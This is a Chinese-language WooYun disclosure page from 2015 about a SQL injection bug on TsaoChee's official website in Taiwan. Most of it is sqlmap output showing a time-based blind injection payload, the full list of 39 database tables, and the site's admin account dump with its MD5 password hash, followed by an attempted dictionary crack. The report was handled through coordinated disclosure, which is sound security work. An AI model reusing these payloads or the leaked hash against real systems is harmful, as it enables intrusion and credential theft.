当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161729

漏洞标题:TsaoChee官网SQL注入漏洞(涉及39表+管理员cmd5)(臺灣地區)

相关厂商:TsaoChee

漏洞作者: 路人甲

提交时间:2015-12-16 11:53

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

坑啊 为了注出管理员,从昨天4点sqlmap跑到今天早上,延时注入
最恶心的是居然还解不出,你个管理员好好的设置那么难的密码干啥

详细说明:

是不是太美,官网地址

[3MMIKH9B}FDTSKVQAW)](B.jpg


注入点:

**.**.**.**/newsinfo.php?id=18&catid=1


简单and 1=1 and 1=2 测试发现不一样
所以直接丢进sqlmap

Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=18) AND SLEEP(5) AND (1892=1892&catid=1
---
[18:27:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[18:27:01] [INFO] fetching current user
[18:27:01] [INFO] retrieved:
[18:27:01] [WARNING] it is very important not to stress the network adapter's
ndwidth during usage of time-based queries
[18:27:17] [INFO] adjusting time delay to 4 seconds due to good response times
tsaochee_maindb@localhost
current user:    'tsaochee_maindb@localhost'


[18:46:32] [WARNING] increasing time delay to 4 seconds
aochee_maindb
available databases [1]:
[*] tsaochee_maindb


39个表,时间盲注太慢了,我直接跑出重要表段

[18:52:59] [INFO] retrieved:
[18:53:11] [INFO] adjusting time delay to 4 seconds due to good
39
[18:53:33] [INFO] retrieved: st_address
[18:57:27] [ERROR] invalid character detected. retrying..
[18:57:27] [WARNING] increasing time delay to 5 seconds
_area
[18:59:23] [INFO] retrieved: st_address_city
[19:02:12] [INFO] retrieved: st_admin_group
[19:06:59] [INFO] retrieved: st_admin_menu
[19:09:51] [INFO] retrieved: st_admin_menulist
[19:13:10] [ERROR] invalid character detected. retrying..
[19:13:10] [WARNING] increasing time delay to 6 seconds
[19:13:14] [INFO] retrieved: st_admin_permisions
[19:19:44] [ERROR] invalid character detected. retrying..
[19:19:44] [WARNING] increasing time delay to 7 seconds
[19:19:48] [INFO] retrieved: st_admin_user
[19:23:14] [INFO] retrieved: st_album_cat
[19:28:24] [ERROR] invalid character detected. retrying..
[19:28:24] [WARNING] increasing time delay to 8 seconds
[19:28:29] [INFO] retrieved: st_al


st_admin_user


Database: tsaochee_maindb
[39 tables]
+----------------------+
| `st_interview\x03`   |
| st_address_area      |
| st_address_city      |
| st_admin_group       |
| st_admin_menu        |
| st_admin_menulist    |
| st_admin_permisions  |
| st_admin_user        |
| st_album_cat         |
| st_album_cat_list    |
| st_album_pic         |
| st_appli             |
| st_application       |
| st_application2      |
| st_application3      |
| st_article           |
| st_article_cat       |
| st_banner            |
| st_banner_cat        |
| st_carewin           |
| st_classes           |
| st_classes_datelistH |
| st_event_cat         |
| st_event_cat_list    |
| st_index_about       |
| st_life              |
| st_mail_tpl          |
| st_member            |
| st_news              |
| st_news_cat          |
| st_pdt_banner        |
| st_product           |
| st_product_cat       |
| st_service           |
| st_share             |
| st_site_basic        |
| st_site_global       |
| st_site_meta         |
| st_suuermqn          |
+----------------------+


擦为了管理员密码 搞的这么晚

se 'tsaochee_maindb'
[00:13:49] [INFO] resumed: 1
[00:13:49] [INFO] retrieved:
[00:13:52] [INFO] retrieved:
[00:13:56] [INFO] retrieved: admin
[00:14:55] [INFO] retrieved: 0
[00:15:12] [INFO] retrieved: 1
[00:15:24] [INFO] retrieved:
[00:15:27] [INFO] retrieved: 0
[00:15:45] [INFO] retrieved:
[00:15:48] [INFO] retrieved: admin
[00:16:47] [INFO] retrieved: 0
[00:17:04] [INFO] retrieved: 0
[00:17:24] [ERROR] invalid character detected. retrying..
[00:17:24] [WARNING] increasing time delay to 3 seconds
9f735a0e7134c506098cc2929
[00:23:36] [ERROR] invalid character detected. retrying..
[00:23:36] [WARNING] increasing time delay to 4 seconds
75d249
[00:25:27] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to c
hem via a dictionary-based attack? [Y/n/q] y
[00:28:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\sqlmap\sqlmap\Bin\txt\wordlist.txt' (press
)
[2] custom dictionary file
[3] file with list of dictionary files
>
[00:28:47] [INFO] using default dictionary
[00:28:47] [INFO] loading dictionary from 'E:\sqlmap\sqlmap\Bin\txt\wordli
'
do you want to use common password suffixes? (slow!) [y/N] y
[00:28:51] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[00:28:51] [WARNING] multiprocessing hash cracking is currently not suppor
 this platform
[00:29:13] [INFO] using suffix '1'
[00:29:18] [INFO] current status: a1soh... /


[1 entry]
+------------+-------------+---------+---------+----+-------+-----------+-------
----+----------+--------+----------------------------------+
| `\x7ftime` | `lastlo?in` | account | groupid | id | jmail | loadlevel | loginc
ode | nickname | online | password                         |
+------------+-------------+---------+---------+----+-------+-----------+-------
----+----------+--------+----------------------------------+
| <blank>    | <blank>     | admin   | 0       | 1  | <blank> | 0         | <bla
nk>   | admin    | 0      | 09f735a0e7134c506098cc292975d249 |
+------------+-------------+---------+---------+----+-------+-----------+-------


问了社区,都解不出了

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-18 13:51

厂商回复:

感謝通報

最新状态:

暂无